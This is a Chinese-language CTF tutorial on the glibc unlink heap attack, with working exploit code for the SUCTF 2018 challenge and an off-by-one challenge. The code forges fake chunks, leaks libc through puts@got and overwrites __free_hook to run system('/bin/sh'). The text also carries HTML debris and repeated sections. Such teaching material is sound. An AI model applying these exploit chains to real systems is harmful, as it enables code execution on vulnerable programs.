Unlink攻击技术详解<\/h1>

1. Unlink基础概念<\/h2>
Unlink是glibc中定义的一个宏，位于malloc.c(libc2.23)中，主要用于从双向链表中移除一个空闲chunk。其核心功能是维护空闲chunk的双向链表结构。<\/p>

1.1 Unlink宏定义<\/h3>

#define unlink(AV, P, BK, FD) {
<\/span><\/span><\/span><\/span>    FD =<\/span> P-><\/span>fd;
<\/span><\/span>    BK =<\/span> P-><\/span>bk;
<\/span><\/span>    if<\/span> (__builtin_expect (FD-><\/span>bk !=<\/span> P ||<\/span> BK-><\/span>fd !=<\/span> P, 0<\/span>))
<\/span><\/span>        malloc_printerr (check_action, "corrupted double-linked list"<\/span>, P, AV);
<\/span><\/span>    else<\/span> {
<\/span><\/span>        FD-><\/span>bk =<\/span> BK;
<\/span><\/span>        BK-><\/span>fd =<\/span> FD;
<\/span><\/span>        if<\/span> (!<\/span>in_smallbin_range (P-><\/span>size) &&<\/span> __builtin_expect (P-><\/span>fd_nextsize !=<\/span> NULL, 0<\/span>)) {
<\/span><\/span>            if<\/span> (__builtin_expect (P-><\/span>fd_nextsize-><\/span>bk_nextsize !=<\/span> P, 0<\/span>) ||<\/span> __builtin_expect (P-><\/span>bk_nextsize-><\/span>fd_nextsize !=<\/span> P, 0<\/span>))
<\/span><\/span>                malloc_printerr (check_action, "corrupted double-linked list (not small)"<\/span>, P, AV);
<\/span><\/span>            if<\/span> (FD-><\/span>fd_nextsize ==<\/span> NULL) {
<\/span><\/span>                if<\/span> (P-><\/span>fd_nextsize ==<\/span> P)
<\/span><\/span>                    FD-><\/span>fd_nextsize =<\/span> FD-><\/span>bk_nextsize =<\/span> FD;
<\/span><\/span>                else<\/span> {
<\/span><\/span>                    FD-><\/span>fd_nextsize =<\/span> P-><\/span>fd_nextsize;
<\/span><\/span>                    FD-><\/span>bk_nextsize =<\/span> P-><\/span>bk_nextsize;
<\/span><\/span>                    P-><\/span>fd_nextsize-><\/span>bk_nextsize =<\/span> FD;
<\/span><\/span>                    P-><\/span>bk_nextsize-><\/span>fd_nextsize =<\/span> FD;
<\/span><\/span>                }
<\/span><\/span>            } else<\/span> {
<\/span><\/span>                P-><\/span>fd_nextsize-><\/span>bk_nextsize =<\/span> P-><\/span>bk_nextsize;
<\/span><\/span>                P-><\/span>bk_nextsize-><\/span>fd_nextsize =<\/span> P-><\/span>fd_nextsize;
<\/span><\/span>            }
<\/span><\/span>        }
<\/span><\/span>    }
<\/span><\/span>}
<\/span><\/span><\/code><\/pre>1.2 Unlink操作的核心<\/h3>
Unlink操作主要完成以下工作：<\/p>

从双向链表中移除指定chunk<\/li>
检查链表完整性（防止链表被破坏）<\/li>
处理大chunk的特殊指针（fd_nextsize和bk_nextsize）<\/li>
<\/ol>
2. Unlink攻击原理<\/h2>
2.1 攻击条件<\/h3>
成功实施unlink攻击需要满足以下条件：<\/p>

存在堆溢出或off-by-one漏洞<\/li>
程序在bss段存储了chunk指针列表（chunk_data_list）<\/li>
能够控制chunk的fd和bk指针<\/li>
<\/ol>
2.2 攻击思路<\/h3>
通过伪造fake chunk并触发unlink操作，将chunk指针劫持到bss段的指针序列地址，从而实现任意地址读写。<\/p>
2.3 关键检查机制<\/h3>
unlink操作会进行以下检查，攻击时需要绕过：<\/p>

检查1<\/strong>：与被释放chunk相邻高地址chunk的prev_size值是否等于被释放chunk的size大小<\/li>
检查2<\/strong>：与被释放chunk相邻高地址chunk的size的P标志位是否为0<\/li>
检查3<\/strong>：检查前后被释放chunk的fd和bk指针是否指向正确的chunk<\/li>
<\/ol>
3. Unlink攻击实战<\/h2>
3.1 [SUCTF 2018招新赛]unlink例题分析<\/h3>
3.1.1 程序分析<\/h4>

保护机制：开启Canary和NX<\/li>
功能：

add：申请堆块，地址存储在bss段的chunk_data_list(0x6020c0)<\/li>
delete：释放堆块<\/li>
show：显示堆块内容<\/li>
edit：编辑堆块内容（存在堆溢出漏洞）<\/li>
<\/ul>
<\/li>
<\/ul>
3.1.2 攻击步骤<\/h4>


初始布局<\/strong>：<\/p>
touch(0x20<\/span>)  # chunk0<\/span>
<\/span><\/span>touch(0x80<\/span>)  # chunk1<\/span>
<\/span><\/span>touch(0x100<\/span>) # chunk2<\/span>
<\/span><\/span><\/code><\/pre><\/li>

构造fake chunk<\/strong>：<\/p>
buf =<\/span> 0x6020c0<\/span>  # chunk_data_list地址<\/span>
<\/span><\/span>prev_size =<\/span> p64(0<\/span>)
<\/span><\/span>chunk_size =<\/span> p64(0x20<\/span>)
<\/span><\/span>fd =<\/span> buf -<\/span> 0x18<\/span>
<\/span><\/span>bk =<\/span> buf -<\/span> 0x10<\/span>
<\/span><\/span>content =<\/span> p64(fd) +<\/span> p64(bk)
<\/span><\/span>of_prev_size =<\/span> p64(0x20<\/span>)
<\/span><\/span>of_chunk_size =<\/span> p64(0x90<\/span>)
<\/span><\/span>payload =<\/span> prev_size +<\/span> chunk_size +<\/span> content +<\/span> of_prev_size +<\/span> of_chunk_size
<\/span><\/span>take_note(0<\/span>, payload)
<\/span><\/span><\/code><\/pre>这段代码在chunk1内构造了一个fake chunk：<\/p>

设置prev_size=0和size=0x20<\/li>
设置fd和bk指向精心构造的地址（绕过检查3）<\/li>
修改chunk1的chunk头，使其看起来像是free状态<\/li>
<\/ul>
<\/li>

触发unlink<\/strong>：<\/p>
delete(1<\/span>)  # 释放chunk1，触发unlink<\/span>
<\/span><\/span><\/code><\/pre>此时：<\/p>

chunk1(0x90)被free进入unsorted bin<\/li>
系统发现其物理相邻的fake chunk为free状态，于是合并<\/li>
fake chunk从伪造的链表中脱链<\/li>
<\/ul>
<\/li>

劫持指针<\/strong>：<\/p>
payload =<\/span> p64(0<\/span>)*<\/span>3<\/span> +<\/span> p64(0x6020c8<\/span>)
<\/span><\/span>take_note(0<\/span>, payload)  # 现在写入的是0x6020a8<\/span>
<\/span><\/span><\/code><\/pre><\/li>

泄露libc地址<\/strong>：<\/p>
payload =<\/span> p64(elf.<\/span>got['puts'<\/span>])
<\/span><\/span>take_note(0<\/span>, payload)  # 修改chunk1指针为puts@got<\/span>
<\/span><\/span>show(1<\/span>)  # 泄露puts地址<\/span>
<\/span><\/span>puts_addr =<\/span> u64(io.<\/span>recvuntil(b<\/span>'<\/span>\x7f<\/span>'<\/span>)[-<\/span>6<\/span>:]+<\/span>b<\/span>'<\/span>\x00\x00<\/span>'<\/span>)
<\/span><\/span>libc_base =<\/span> puts_addr -<\/span> libc.<\/span>sym['puts'<\/span>]
<\/span><\/span><\/code><\/pre><\/li>

劫持free_hook<\/strong>：<\/p>
free_hook =<\/span> libc_base +<\/span> libc.<\/span>sym['__free_hook'<\/span>]
<\/span><\/span>bin_sh_str =<\/span> libc_base +<\/span> next(libc.<\/span>search(b<\/span>'\/bin\/sh<\/span>\x00<\/span>'<\/span>))
<\/span><\/span>payload =<\/span> p64(free_hook) +<\/span> p64(bin_sh_str)
<\/span><\/span>take_note(0<\/span>, payload)
<\/span><\/span>system =<\/span> libc_base +<\/span> libc.<\/span>sym['system'<\/span>]
<\/span><\/span>take_note(1<\/span>, p64(system))
<\/span><\/span>delete(2<\/span>)  # 触发free("\/bin\/sh")，实际执行system("\/bin\/sh")<\/span>
<\/span><\/span><\/code><\/pre><\/li>
<\/ol>
3.2 off-by-one unlink例题分析<\/h3>
3.2.1 与前一题的区别<\/h4>

堆溢出漏洞变为off-by-one漏洞<\/li>
需要更精细的堆布局<\/li>
<\/ul>
3.2.2 攻击步骤<\/h4>


初始布局<\/strong>：<\/p>
new(0x108<\/span>, 'zzz'<\/span>)  # chunk0，大小0x100+8<\/span>
<\/span><\/span>new(0xf0<\/span>, 'aaa'<\/span>)   # chunk1<\/span>
<\/span><\/span>new(0x100<\/span>, '\/bin\/sh<\/span>\x00<\/span>'<\/span>)  # chunk2，与top chunk隔离<\/span>
<\/span><\/span><\/code><\/pre><\/li>

构造fake chunk<\/strong>：<\/p>
data_addr =<\/span> 0x602120<\/span>  # chunk_data_list地址<\/span>
<\/span><\/span>payload =<\/span> p64(0<\/span>) +<\/span> p64(0x101<\/span>) +<\/span> p64(data_addr-<\/span>0x18<\/span>) +<\/span> p64(data_addr-<\/span>0x10<\/span>)
<\/span><\/span>payload =<\/span> payload.<\/span>ljust(0x100<\/span>, b<\/span>'a'<\/span>) +<\/span> p64(0x100<\/span>) +<\/span> p8(0<\/span>)
<\/span><\/span>edit(0<\/span>, payload)
<\/span><\/span><\/code><\/pre>这段代码：<\/p>

构造fake chunk的prev_size和size<\/li>
设置fd和bk绕过检查<\/li>
使用off-by-one覆盖下一个chunk的size最低位<\/li>
<\/ul>
<\/li>

触发unlink<\/strong>：<\/p>
delete(1<\/span>)  # 触发合并和unlink<\/span>
<\/span><\/span><\/code><\/pre><\/li>

泄露libc地址<\/strong>：<\/p>
edit(0<\/span>, p64(0<\/span>)*<\/span>3<\/span> +<\/span> p64(data_addr-<\/span>0x18<\/span>) +<\/span> p64(0x602018<\/span>))
<\/span><\/span>show(1<\/span>)
<\/span><\/span>leak =<\/span> u64(p.<\/span>recv(6<\/span>).<\/span>ljust(8<\/span>, b<\/span>'<\/span>\x00<\/span>'<\/span>))
<\/span><\/span>libc_base =<\/span> leak -<\/span> 0x84540<\/span>
<\/span><\/span><\/code><\/pre><\/li>

劫持控制流<\/strong>：<\/p>
free_hook =<\/span> 0x84540<\/span> +<\/span> libc_base
<\/span><\/span>edit(0<\/span>, p64(0<\/span>)*<\/span>3<\/span> +<\/span> p64(0x6020c0<\/span>-<\/span>0x18<\/span>) +<\/span> p64(0x602018<\/span>))
<\/span><\/span>edit(1<\/span>, p64(0x453a0<\/span>+<\/span>libc_base))
<\/span><\/span>delete(2<\/span>)  # 触发system("\/bin\/sh")<\/span>
<\/span><\/span><\/code><\/pre><\/li>
<\/ol>
4. 关键技巧总结<\/h2>


fake chunk构造<\/strong>：<\/p>

精心设置fd和bk指针，使其指向看似合法的位置<\/li>
通常fd = &target-0x18，bk = &target-0x10<\/li>
<\/ul>
<\/li>

绕过检查<\/strong>：<\/p>

确保伪造的fd->bk == P且bk->fd == P<\/li>
正确设置prev_size和size字段<\/li>
<\/ul>
<\/li>

利用链构造<\/strong>：<\/p>

通过unlink将chunk指针劫持到可控区域<\/li>
利用指针修改实现任意地址读写<\/li>
<\/ul>
<\/li>

不同漏洞利用<\/strong>：<\/p>

堆溢出：直接覆盖后续chunk的元数据<\/li>
off-by-one：精细控制覆盖范围，通常只修改size的最低字节<\/li>
<\/ul>
<\/li>
<\/ol>
5. 防御措施<\/h2>


最新glibc中的改进<\/strong>：<\/p>

增加了更多的完整性检查<\/li>
对unlink操作进行了更严格的验证<\/li>
<\/ul>
<\/li>

开发建议<\/strong>：<\/p>

避免使用不安全的堆操作函数<\/li>
及时更新libc版本<\/li>
使用现代防护机制如FORTIFY_SOURCE<\/li>
<\/ul>
<\/li>
<\/ol>
6. 扩展思考<\/h2>


其他版本的unlink<\/strong>：<\/p>

不同glibc版本的unlink实现可能有差异<\/li>
需要针对特定版本调整攻击方式<\/li>
<\/ul>
<\/li>

组合利用技巧<\/strong>：<\/p>

结合其他堆利用技术如fastbin attack<\/li>
与格式化字符串漏洞等结合使用<\/li>
<\/ul>
<\/li>
<\/ol>
通过深入理解unlink机制及其利用方式，可以更好地理解glibc堆管理的内部工作原理，并提高对堆漏洞的挖掘和利用能力。<\/p>

Unlink攻击技术详解<\/h1>

1. Unlink基础概念<\/h2> Unlink是glibc中定义的一个宏，位于malloc.c(libc2.23)中，主要用于从双向链表中移除一个空闲chunk。其核心功能是维护空闲chunk的双向链表结构。<\/p>

2. Unlink攻击原理<\/h2>

2.2 攻击思路<\/h3> 通过伪造fake chunk并触发unlink操作，将chunk指针劫持到bss段的指针序列地址，从而实现任意地址读写。<\/p>

3. Unlink攻击实战<\/h2>

3.1 [SUCTF 2018招新赛]unlink例题分析<\/h3>

3.2 off-by-one unlink例题分析<\/h3>

1. Unlink基础概念<\/h2>
Unlink是glibc中定义的一个宏，位于malloc.c(libc2.23)中，主要用于从双向链表中移除一个空闲chunk。其核心功能是维护空闲chunk的双向链表结构。<\/p>

2.2 攻击思路<\/h3>
通过伪造fake chunk并触发unlink操作，将chunk指针劫持到bss段的指针序列地址，从而实现任意地址读写。<\/p>